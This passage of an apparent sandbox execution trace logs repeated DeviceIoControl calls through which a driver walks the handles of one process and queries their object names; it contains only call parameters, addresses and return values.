0x0 [0222.318] PsAcquireProcessExitSynchronization () returned 0x0 [0222.318] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.319] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018cc680, HandleInformation=0x0) returned 0x0 [0222.319] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.319] PsReleaseProcessExitSynchronization () returned 0x2 [0222.319] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.319] ObQueryNameString (in: Object=0xfffff8a0018cc680, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.319] ObfDereferenceObject (Object=0xfffff8a0018cc680) returned 0x1 [0222.319] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.319] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.319] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.319] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.319] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.319] PsAcquireProcessExitSynchronization () returned 0x0 [0222.319] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.319] ObReferenceObjectByHandle (in: Handle=0x610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00186efc0, HandleInformation=0x0) returned 0x0 [0222.319] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.319] PsReleaseProcessExitSynchronization () returned 0x2 [0222.319] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.319] ObQueryNameString (in: Object=0xfffff8a00186efc0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.319] ObfDereferenceObject (Object=0xfffff8a00186efc0) returned 0x1 [0222.319] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.319] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.319] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.319] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.320] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.320] PsAcquireProcessExitSynchronization () returned 0x0 [0222.320] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.320] ObReferenceObjectByHandle (in: Handle=0x620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018d8520, HandleInformation=0x0) returned 0x0 [0222.320] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.320] PsReleaseProcessExitSynchronization () returned 0x2 [0222.320] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.320] ObQueryNameString (in: Object=0xfffff8a0018d8520, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.320] ObfDereferenceObject (Object=0xfffff8a0018d8520) returned 0x1 [0222.320] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.320] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.320] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.320] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.320] PsAcquireProcessExitSynchronization () returned 0x0 [0222.320] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.320] ObReferenceObjectByHandle (in: Handle=0x630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018da480, HandleInformation=0x0) returned 0x0 [0222.320] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.320] PsReleaseProcessExitSynchronization () returned 0x2 [0222.320] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.320] ObQueryNameString (in: Object=0xfffff8a0018da480, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.320] ObfDereferenceObject (Object=0xfffff8a0018da480) returned 0x1 [0222.320] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.321] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.321] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.321] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.321] PsAcquireProcessExitSynchronization () returned 0x0 [0222.321] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.321] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018dad60, HandleInformation=0x0) returned 0x0 [0222.321] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.321] PsReleaseProcessExitSynchronization () returned 0x2 [0222.321] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.321] ObQueryNameString (in: Object=0xfffff8a0018dad60, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.321] ObfDereferenceObject (Object=0xfffff8a0018dad60) returned 0x1 [0222.321] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.321] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.321] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.321] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.321] PsAcquireProcessExitSynchronization () returned 0x0 [0222.321] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.321] ObReferenceObjectByHandle (in: Handle=0x650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018e41a0, HandleInformation=0x0) returned 0x0 [0222.321] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.321] PsReleaseProcessExitSynchronization () returned 0x2 [0222.321] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.322] ObQueryNameString (in: Object=0xfffff8a0018e41a0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.322] ObfDereferenceObject (Object=0xfffff8a0018e41a0) returned 0x1 [0222.322] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.322] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.322] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.322] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.322] PsAcquireProcessExitSynchronization () returned 0x0 [0222.322] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.322] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018e17f0, HandleInformation=0x0) returned 0x0 [0222.322] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.322] PsReleaseProcessExitSynchronization () returned 0x2 [0222.322] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.322] ObQueryNameString (in: Object=0xfffff8a0018e17f0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.322] ObfDereferenceObject (Object=0xfffff8a0018e17f0) returned 0x1 [0222.322] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.322] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.322] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.322] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.322] PsAcquireProcessExitSynchronization () returned 0x0 [0222.322] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.323] ObReferenceObjectByHandle (in: Handle=0x670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018eac20, HandleInformation=0x0) returned 0x0 [0222.323] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.323] PsReleaseProcessExitSynchronization () returned 0x2 [0222.323] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.323] ObQueryNameString (in: Object=0xfffff8a0018eac20, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.323] ObfDereferenceObject (Object=0xfffff8a0018eac20) returned 0x1 [0222.323] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.323] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.323] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.323] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.323] PsAcquireProcessExitSynchronization () returned 0x0 [0222.323] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.323] ObReferenceObjectByHandle (in: Handle=0x680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018e1690, HandleInformation=0x0) returned 0x0 [0222.323] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.323] PsReleaseProcessExitSynchronization () returned 0x2 [0222.323] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.323] ObQueryNameString (in: Object=0xfffff8a0018e1690, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.323] ObfDereferenceObject (Object=0xfffff8a0018e1690) returned 0x1 [0222.323] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.323] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.323] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.323] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.324] PsAcquireProcessExitSynchronization () returned 0x0 [0222.324] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.324] ObReferenceObjectByHandle (in: Handle=0x690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018f1e50, HandleInformation=0x0) returned 0x0 [0222.324] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.324] PsReleaseProcessExitSynchronization () returned 0x2 [0222.324] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.324] ObQueryNameString (in: Object=0xfffff8a0018f1e50, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.324] ObfDereferenceObject (Object=0xfffff8a0018f1e50) returned 0x1 [0222.324] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.324] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.324] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.324] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.324] PsAcquireProcessExitSynchronization () returned 0x0 [0222.324] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.324] ObReferenceObjectByHandle (in: Handle=0x6a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018da6d0, HandleInformation=0x0) returned 0x0 [0222.324] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.324] PsReleaseProcessExitSynchronization () returned 0x2 [0222.324] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.324] ObQueryNameString (in: Object=0xfffff8a0018da6d0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.324] ObfDereferenceObject (Object=0xfffff8a0018da6d0) returned 0x1 [0222.324] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.324] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.324] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.325] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.325] PsAcquireProcessExitSynchronization () returned 0x0 [0222.325] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.325] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018f4ee0, HandleInformation=0x0) returned 0x0 [0222.325] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.325] PsReleaseProcessExitSynchronization () returned 0x2 [0222.325] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.325] ObQueryNameString (in: Object=0xfffff8a0018f4ee0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.325] ObfDereferenceObject (Object=0xfffff8a0018f4ee0) returned 0x1 [0222.325] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.325] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.325] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.325] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.325] PsAcquireProcessExitSynchronization () returned 0x0 [0222.325] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.325] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018f8b10, HandleInformation=0x0) returned 0x0 [0222.325] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.325] PsReleaseProcessExitSynchronization () returned 0x2 [0222.325] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.325] ObQueryNameString (in: Object=0xfffff8a0018f8b10, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.325] ObfDereferenceObject (Object=0xfffff8a0018f8b10) returned 0x1 [0222.325] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.326] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.326] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.326] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.326] PsAcquireProcessExitSynchronization () returned 0x0 [0222.326] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.326] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018e7060, HandleInformation=0x0) returned 0x0 [0222.326] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.326] PsReleaseProcessExitSynchronization () returned 0x2 [0222.326] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.326] ObQueryNameString (in: Object=0xfffff8a0018e7060, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.326] ObfDereferenceObject (Object=0xfffff8a0018e7060) returned 0x1 [0222.326] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.326] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.326] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.326] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.326] PsAcquireProcessExitSynchronization () returned 0x0 [0222.326] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.326] ObReferenceObjectByHandle (in: Handle=0x6e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019008c0, HandleInformation=0x0) returned 0x0 [0222.326] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.326] PsReleaseProcessExitSynchronization () returned 0x2 [0222.326] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.327] ObQueryNameString (in: Object=0xfffff8a0019008c0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.327] ObfDereferenceObject (Object=0xfffff8a0019008c0) returned 0x1 [0222.327] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.327] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.327] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.327] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.327] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.327] PsAcquireProcessExitSynchronization () returned 0x0 [0222.327] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.327] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 